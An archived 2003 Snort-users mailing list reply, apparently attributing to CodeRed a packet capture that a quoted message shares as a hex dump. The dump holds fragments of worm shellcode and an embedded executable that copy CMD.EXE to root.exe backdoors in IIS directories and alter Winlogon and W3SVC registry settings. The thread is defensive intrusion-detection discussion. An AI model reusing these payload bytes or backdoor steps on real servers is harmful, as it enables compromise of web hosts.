Snort mailing list archives
RE: different CMD.exe access?!?
From: "L. Christopher Luther" <CLuther () Xybernaut com>
Date: Tue, 11 Mar 2003 11:40:08 -0500
By the references to root.exe, it looks like CodeRed to me (IMHO). I've also noticed that some of the packet dumps contain 'garbage' or what may be left over from other memory segments. I believe that there may have been a SANS or CERT notification about some TCP/IP stacks that leave droppings around. Christopher -----Original Message----- From: John Hally [mailto:JHally () epnet com] Sent: Tuesday, March 11, 2003 10:59 AM To: 'snort-users () lists sourceforge net' Subject: [Snort-users] different CMD.exe access?!? Hello, This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? it originated from 219.240.31.44, over in Korea: 000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E.... 010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro 020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E...... 030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E 040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow 050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E 060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i..... () E xV 070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t 080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............ 090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................ 0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. . 0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................ 0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................ 0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X... 0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X. 0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\... 100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........ 110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c 120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu 130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e 140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P. 150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog 160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy 170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root. 180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P 190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP.... 1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................ 1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@.............. 1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%).... 1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................ 1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................ 1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@......... 200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................ 210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@.............. 220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... .......... 230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................ 240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0.............. 250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................ 270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ............... 280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`............. 290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ............... 2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........ 2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0....... 2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@ 2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................ 300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h 310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a..... 320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h 330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h. 340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h 350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h.... 360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @. 370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@.. 380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h 390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @. 3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU.. 3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B. 3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h. 3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h 3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5. 3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@... 400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h. 410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U 420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI. 430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>. 440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217 450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5. 460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5. 470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@.. 480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@ 490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%| 4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@.............. 4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE. 4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro 4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\ 4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W 500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis 510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM 520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS 530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV 540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir 550 : 74 75 61 6C 20 52 6F 6F tual Roo ------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
- Re: different CMD.exe access?!? Phil Wood (Mar 11)
- Re: different CMD.exe access?!? Paul Schmehl (Mar 11)
- <Possible follow-ups>
- RE: different CMD.exe access?!? L. Christopher Luther (Mar 11)
- RE: different CMD.exe access?!? Ricardo, Gerson (Mar 14)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)